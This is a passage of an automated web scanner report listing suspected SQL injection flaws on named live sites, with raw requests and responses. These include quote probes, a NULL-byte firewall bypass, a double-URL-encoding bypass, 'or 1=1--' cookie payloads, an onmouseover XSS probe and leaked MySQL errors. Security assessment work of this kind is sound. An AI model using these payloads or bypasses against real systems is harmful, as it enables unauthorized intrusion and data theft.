GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16'&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 14:00:34 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12317

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
L3hzcy1kb3JrLWNyb3NzLXNpdGUtc2NyaXB0aW5nLW1zbndoaXRlcGFnZXNjb20uaHRtbKgDAcgDF-gD3QXoA4oD6APiBegDugL1AwIAAMQ&num=2&sig=AGiWqtyvoRnT7_XBYCMbzl_kBgPSVrAlcA&client=ca-pub-4063878933780912&adurl=http://www.errorteck.com" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=_top title="www.ErrorTeck.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16''&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 14:00:36 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4098

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...

1.7. http://googleads.g.doubleclick.net/pagead/ads [u_h parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The u_h parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_h parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200%00'&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 13:58:22 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12507

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
y94c3MtZG9yay1jcm9zcy1zaXRlLXNjcmlwdGluZy1tc253aGl0ZXBhZ2VzY29tLmh0bWyoAwHIAxfoA90F6AOKA-gD4gXoA7oC9QMCAADE&num=2&sig=AGiWqtyi1rn2uRrvPguh1q-agLK2-d5y9A&client=ca-pub-4063878933780912&adurl=http://www.errorteck.com" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=_top title="www.ErrorTeck.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200%00''&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 13:58:23 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12481

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...

1.8. http://googleads.g.doubleclick.net/pagead/ads [url parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The url parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the url parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the url request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html%2527&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 13:50:18 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12234

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
4c3MtZG9yay1jcm9zcy1zaXRlLXNjcmlwdGluZy1tc253aGl0ZXBhZ2VzY29tLmh0bWwnqAMByAMX6APdBegDigPoA-IF6AO6AvUDAgAAxA&num=2&sig=AGiWqty8MXeYQZr7hKVhCpbj7a3Uah-E1Q&client=ca-pub-4063878933780912&adurl=http://www.errorteck.com" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=_top title="www.ErrorTeck.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html%2527%2527&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 13:50:19 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12603

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...

1.9. http://googleads.g.doubleclick.net/pagead/ads [w parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The w parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the w parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728'&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 08:24:21 GMT
Server: cafe
Cache-Control: private
Content-Length: 12314
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
y94c3MtZG9yay1jcm9zcy1zaXRlLXNjcmlwdGluZy1tc253aGl0ZXBhZ2VzY29tLmh0bWyoAwHIAxfoA90F6AOKA-gD4gXoA7oC9QMCAADE&num=2&sig=AGiWqtx6GWNZkt3zuGqGDv8UVFUYZSOPDg&client=ca-pub-4063878933780912&adurl=http://www.errorteck.com" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=_top title="www.ErrorTeck.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728''&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 08:24:22 GMT
Server: cafe
Cache-Control: private
Content-Length: 12331
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...

1.10. http://visitordrive.com/evTracker/evtracker.php [_evacct parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://visitordrive.com
Path:   /evTracker/evtracker.php

Issue detail

The _evacct parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the _evacct parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /evTracker/evtracker.php?_evacct=1'&_evT=Miller%20-%20Where%20to%20Buy%20-%20Distributor%20Locator&_evId=fc0c626fe6241db934df6d4f182a5f42&_evRef=http%3A//www.millerwelds.com/landingf0d5d%2522%253E%253Ca%253E5d463450d54/drive/%3Futm_source%3DPowerBlockTV%26utm_campaign%3Dtoolsthatdrive%26utm_medium%3Dbannerad%26utm_content%3Donline&_evUrl=http%3A//www.millerwelds.com/wheretobuy/ HTTP/1.1
Host: visitordrive.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/wheretobuy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 17:28:48 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 299
Connection: close
Content-Type: text/html

</td></tr></table><b>Database error:</b> Invalid SQL: select name from client where clientID='1''<br>
<b>MySQL Error</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1)<br>
...[SNIP]...

Request 2

GET /evTracker/evtracker.php?_evacct=1''&_evT=Miller%20-%20Where%20to%20Buy%20-%20Distributor%20Locator&_evId=fc0c626fe6241db934df6d4f182a5f42&_evRef=http%3A//www.millerwelds.com/landingf0d5d%2522%253E%253Ca%253E5d463450d54/drive/%3Futm_source%3DPowerBlockTV%26utm_campaign%3Dtoolsthatdrive%26utm_medium%3Dbannerad%26utm_content%3Donline&_evUrl=http%3A//www.millerwelds.com/wheretobuy/ HTTP/1.1
Host: visitordrive.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/wheretobuy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 17:28:48 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 0
Connection: close
Content-Type: text/html


1.11. http://visitordrive.com/evTracker/services/keywords.php [edate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://visitordrive.com
Path:   /evTracker/services/keywords.php

Issue detail

The edate parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the edate parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

POST /evTracker/services/keywords.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.0_rc1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: visitordrive.com
Accept-Encoding: gzip, deflate
Content-Length: 44

sdate=04%2f18%2f2011&edate=04%2f18%2f2011'&_=

Response 1

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 18:15:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 536
Connection: close
Content-Type: text/html

</td></tr></table><b>Database error:</b> Invalid SQL:        select date_format(`cdate`,'%Y') as year,
       date_format(`cdate`,'%m') as month,
       date_format(`cdate`,'%d') as day,
       `pathQuery`
       from click
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '23:59:59'
       AND `pathQuery` != ''' at line 6)<br>
...[SNIP]...

Request 2

POST /evTracker/services/keywords.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.0_rc1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: visitordrive.com
Accept-Encoding: gzip, deflate
Content-Length: 44

sdate=04%2f18%2f2011&edate=04%2f18%2f2011''&_=

Response 2

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 18:15:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 2
Connection: close
Content-Type: text/html

[]

1.12. http://visitordrive.com/evTracker/services/keywords.php [sdate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://visitordrive.com
Path:   /evTracker/services/keywords.php

Issue detail

The sdate parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sdate parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

POST /evTracker/services/keywords.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.0_rc1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: visitordrive.com
Accept-Encoding: gzip, deflate
Content-Length: 44

sdate=04%2f18%2f2011'&edate=04%2f18%2f2011&_=

Response 1

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 18:15:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 574
Connection: close
Content-Type: text/html

</td></tr></table><b>Database error:</b> Invalid SQL:        select date_format(`cdate`,'%Y') as year,
       date_format(`cdate`,'%m') as month,
       date_format(`cdate`,'%d') as day,
       `pathQuery`
       from click
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '00:00:00'
       AND `cdate` < '2011-04-18 23:59:59'
       AND `pathQuery` != ''' at line 5)<br>
...[SNIP]...

Request 2

POST /evTracker/services/keywords.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.0_rc1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: visitordrive.com
Accept-Encoding: gzip, deflate
Content-Length: 44

sdate=04%2f18%2f2011''&edate=04%2f18%2f2011&_=

Response 2

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 18:15:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 2
Connection: close
Content-Type: text/html

[]

1.13. http://www.curtis.com/emaildisclaimer.cfm [CFID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 53431827%20or%201%3d1--%20 and 53431827%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=617584353431827%20or%201%3d1--%20; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Sun, 18-Apr-2010 17:06:36 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

